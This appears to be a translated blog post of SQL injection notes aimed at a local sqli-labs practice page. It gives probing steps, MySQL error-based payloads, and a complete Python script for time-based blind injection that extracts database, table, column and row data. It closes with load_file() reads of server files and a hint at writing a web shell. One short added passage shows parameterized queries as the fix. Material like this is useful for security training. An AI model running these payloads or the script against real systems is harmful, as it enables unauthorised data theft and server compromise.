SQL injection
2022-07-26 05:20:00 【jjj34】
Contents
Ten kinds of MySQL error-based injection - "I wipe what the hell" - Blog Garden (cnblogs.com)
Time-based blind injection Python script:
Notes:
When injecting through the URL, URL-encode the payload first, e.g. # -> %23
1. Use 1' # to tell whether the parameter is a string or a number
String: select * from user where id = '$'
Numeric: select * from user where id = $
The numeric form throws an error:
select * from user where id = 1' #
The string form does not:
select * from user where id = '1' #
You may also need 1') # to find out whether the parameter is wrapped in brackets; extend it to
1'))# 1')))# 1"))# 1")))#
# can also be written as --+
2. Find the number of returned columns
order by 1....
select 1,2,3......
3. Find the database name
select database()
4. Find the table names
select group_concat(table_name) from information_schema.tables where table_schema = database(); database() can be replaced with 'the database name found'
5. Find the column names
select group_concat(column_name) from information_schema.columns where table_schema = database() and table_name = '$';
6. Read the data
select group_concat($1) from $2
Two common functions for error-based injection
extractvalue()
select * from test where id=1 and (extractvalue(1,concat(0x7e,(select user()),0x7e)));
floor()
select * from test where id=1 and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a);
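To see why the 1' probe from step 1 behaves differently in the numeric and string contexts, and what the hardened query looks like, here is an added example that is not part of the original post. It uses an in-memory SQLite table (SQLite's comment token is --, the alternative the page mentions, rather than #); the table, the sample rows and the probe() helper are constructed for the demonstration.

```python
import sqlite3


def make_db():
    # Constructed sample table: id is numeric, name is text
    con = sqlite3.connect(":memory:")
    con.execute("create table user (id integer primary key, name text)")
    con.executemany("insert into user values (?, ?)", [(1, "alice"), (2, "bob")])
    return con


def query_numeric_concat(con, value):
    # Vulnerable, numeric context: select * from user where id = $
    return con.execute("select name from user where id = " + value).fetchall()


def query_string_concat(con, value):
    # Vulnerable, string context: select * from user where id = '$'
    return con.execute("select name from user where id = '" + value + "'").fetchall()


def query_parameterized(con, value):
    # Hardened: the value is bound as data and is never parsed as SQL,
    # so a quote or comment marker inside it cannot change the statement
    return con.execute("select name from user where id = ?", (value,)).fetchall()


def probe(func, con, value):
    """Run one query and report ('ok', rows) or ('error', message), mirroring the page's error/no-error test."""
    try:
        return ("ok", func(con, value))
    except sqlite3.Error as exc:
        return ("error", str(exc))
```

With the input 1' -- the numeric-context query fails to parse, the string-context query silently succeeds because the rest of the statement is commented out, and the parameterized query simply matches nothing.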
Ten kinds of MySQL error-based injection - "I wipe what the hell" - Blog Garden (cnblogs.com)
Time-based blind injection Python script:
"""
Instructions
database_length = database_length()              Return the length of the database name
database_name(a)                                 Pass in the database name length, return the database name
table_count()                                    Output the number of tables
table_length = table_length()                    Return the length of the joined table-name list
table_name(length)                               Pass in the table-name list length, output the names of all tables
column_length = column_length()                  Pass in a single table name, query the column-name list length for that table
column_name(column_length,table_name)            Pass in the table name and column length, query all column names
flag_length(table_name,column_name)              Pass in the table name and column name, return the data length
flag_name(table_name,column_name,flag_length)    Pass in the table name, column name and data length, return the data value
"""
'''
Syntax summary:
if($,1,2)                     if $ is true output 1, otherwise output 2
substr(string,count1,count2)  start at position count1 and take count2 characters, e.g. substr(string,1,1) == s
ascii(char)                   convert char to its ASCII code, e.g. ascii(A) == 65
length(string)                return the string length
database()                    return the database name
'''
import time

import requests

base_url = "http://127.0.0.1:80/Less-6/?id="
passtime = 2  # seconds the injected sleep() lasts; a response slower than this means the condition was true


# Length of the database name
def database_length():
    # select * from news where id= 1 and sleep(1)
    # if(?,1,2): if ? is true output 1, otherwise output 2
    # 0 is not tried
    for i in range(1, 45):
        # 1+and+length%28database%28%29%29+%3D+4+and+sleep%283%29
        url = base_url + "1\" and if( length(database())={} , sleep(%s) ,1) --+ ".format(i) % passtime
        # 0%27/**/and/**/if( (length(select database())={} , sleep(2) ,1) %23
        start_time = time.time()
        requests.get(url)
        end_time = time.time()
        if end_time - start_time > passtime:  # the delay means the guess was right
            print("database_length->", i)
            return i
    # The database name length is 4


# Find the database name
def database_name(length_database):
    # Take one character at a time; once it matches, move on to the next character
    # The character range is 0-9, a-z, A-Z
    # ran = "abcdefghijklmnopqrstuvwxyz"
    result = ""
    for i in range(1, length_database + 1):  # which character position is being tested
        for j in range(33, 124):
            # ascii(substr(database(),{i},1))={j}
            url = base_url + "1' and if(ascii(substr(database(),{},1))={},sleep({}),1) --+ ".format(i, j, passtime)
            start_time = time.time()
            requests.get(url)
            end_time = time.time()
            # print(i, j)
            if end_time - start_time > passtime:
                result += chr(j)
                break
    # The database name is sqli
    print("database_name->result:", result)
    return result


# Table names: join them with group_concat, then work through the joined string
# Table-name list length
# select group_concat(table_name) from information_schema.tables where table_schema = database()
# length(select group_concat(table_name) from information_schema.tables where table_schema = database())={}
def table_count():
    i = 0
    while True:
        # '?id=1 and if((select count(*) from information_schema.tables where table_schema=database())={},sleep(0.5),1)'.format(i)
        url = base_url + "1' and if((select count(*) from information_schema.tables where table_schema=database())={},sleep(%s),1) --+" % passtime
        real_url = url.format(i)
        start_time = time.time()
        requests.get(real_url)
        end_time = time.time()
        if end_time - start_time > passtime:
            print("table_count()->result:", i)
            return i
        # print(i)
        i += 1
    # Two tables


# Length of the joined table-name string
def table_length():
    # Join with group_concat, then test the length of the joined string
    # (select group_concat(table_name) from information_schema.tables where table_schema = database())
    # length()={}
    # if($,sleep(3),1)
    i = 0
    while True:
        url = base_url + "1' and if( length( (select group_concat(table_name) from information_schema.tables where table_schema = database()) )={},sleep(%s),1) --+" % passtime
        real_url = url.format(i)
        start_time = time.time()
        requests.get(real_url)
        end_time = time.time()
        if end_time - start_time > passtime:
            print("table_length()->result:", i)
            return i
        i += 1


def table_name(table_length):
    result = ""
    for i in range(1, table_length + 1):  # the i-th character
        for j in range(33, 127):  # ascii
            # if($,sleep(3),1)
            # ascii()={}
            # substr($,{},1)
            # (select group_concat(table_name) from information_schema.tables where table_schema=database())
            url = base_url + "1' and if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{},1))={},sleep(%s),1) --+" % passtime
            real_url = url.format(i, j)
            start_time = time.time()
            requests.get(real_url)
            end_time = time.time()
            if end_time - start_time > passtime:
                result += chr(j)
                print("table_name->result:", result)
                break
    return result


# Columns work the same way as table names: find the length first, then the individual characters
def column_length(table_name):
    i = 0
    while True:
        # if($,sleep(5),3)
        # length()={}
        # (select concat(column_name) from information_schema.columns where table_name='flag' and table_schema=database())
        url = base_url + "1' and if( length( (select group_concat(column_name) from information_schema.columns where table_name='{}' and table_schema=database()) )={},sleep({}),3) --+ "
        real_url = url.format(table_name, i, passtime)
        start_time = time.time()
        requests.get(real_url)
        end_time = time.time()
        # print(i)
        if end_time - start_time > passtime:
            print("column_length->result:", i)
            return i
        # print(i)
        i += 1


def column_name(column_length, table_name):
    result = ""
    for i in range(1, column_length + 1):
        for j in range(33, 127):
            # if((),sleep(3),1)
            # ascii()
            # substr((),{},1)
            # (select column_name from information_schema.columns where table_name='flag' and table_schema=database())
            url = base_url + "1' and if( ascii( substr( (select group_concat(column_name) from information_schema.columns where table_name='{}' and table_schema=database()) , {} ,1 ) )={} , sleep({}) , 1) --+"
            real_url = url.format(table_name, i, j, passtime)
            start_time = time.time()
            requests.get(real_url)
            end_time = time.time()
            if end_time - start_time > passtime:
                result += chr(j)
                print("column_name->result", result)
                break
    return result


# Read the data: length first, then the individual characters
def flag_length(table_name, column_name):
    i = 0
    while True:
        url = base_url + "1' and if( ( length( (select group_concat({}) from {}) ) )={},sleep({}),1) --+"
        real_url = url.format(column_name, table_name, i, passtime)
        start_time = time.time()
        requests.get(real_url)
        end_time = time.time()
        if end_time - start_time > passtime:
            print(i)
            return i
        i += 1


def flag_name(table_name, column_name, flag_length):
    result = ""
    for i in range(1, flag_length + 1):
        for j in range(33, 127):
            # if((()={}),sleep(3),1)
            # ascii()
            # substr((),{},1)
            # (select flag from flag)
            url = base_url + "1' and if( ( ( ascii( substr( ( (select group_concat({}) from {}) ),{},1) ) )={}),sleep({}),1) --+"
            real_url = url.format(column_name, table_name, i, j, passtime)
            start_time = time.time()
            requests.get(real_url)
            end_time = time.time()
            if end_time - start_time > passtime:
                result += chr(j)
                print("flag_name->%s" % column_name, result)
                break
    return result


if __name__ == "__main__":
    db_length = database_length()
    # database_name(8)
    # table_count()  # not necessary
    # tbl_length = table_length()
    # table_name(tbl_length)
    # col_length = column_length("users")
    # column_name(20, "users")
    # flag_length("users", "username")
    # flag_name("users", "password", 91)
Reading and writing files
Prerequisite: the current database user has high privileges
What to read? User information, account names, passwords
select load_file('path')
For example
select load_file('d:/d.txt')
select load_file('/var/www/html/flag.php')
What to write? A one-liner